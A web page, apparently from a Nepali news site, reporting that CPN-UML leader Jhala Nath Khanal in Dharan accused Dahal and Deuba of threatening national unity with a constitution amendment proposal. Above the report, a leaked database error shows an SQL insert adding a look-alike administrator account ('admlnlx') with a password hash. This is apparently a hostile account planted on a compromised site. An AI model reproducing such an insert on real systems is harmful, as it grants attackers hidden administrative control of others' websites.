WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSQVrIojFxf9C.kYYa0p7yINo5hmZC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:51:44', '', 'admlnlx', 'admlnlx')
सुनसरी, पुस ९-
नेकपा एमालेका वरिष्ठ नेता झलनाथ खनालले प्रधानमन्त्री पुष्पकमल दाहाल र काग्रेस सभापति शेरबहादुर देउवाले राष्ट्रिय एकता खल्बल्याउन खोजेको आरोप लगाएका छन् ।
सुनसरीको धरानमा आज सञ्चारकर्मीहरुसँग कुरा गर्दै नेता खनालले दाहाल र देउवाले नै देश टुक्र्याउने गरी संविधान संशोधन प्रस्ताव संसदमा दर्ता गराएको आरोप लगाएका हुन् ।उनले भारतको डिजाइनमा संविधान संशोधनको प्रस्ताव संसद्मा दर्ता गरिएकाले त्यो कुनै पनि हालतमा आफूहरुलाई मान्य नहुने बताए ।
कांग्रेस र माओवादी केन्द्रले विदेसीको इसारामा लागेर राष्ट्रिय हितविपरितको संशोधनको प्रस्ताव ल्याएकाले एमालेले संशोधन प्रस्तावको विरोध गरेको उनको भनाइ थियो ।नेता खनालले संविधानसभाले पारित गरेको संविधानमा राखिएको सात प्रदेशको खाकामा एक इन्च पनि तलमाथी पार्न नदिने दाबी गरे ।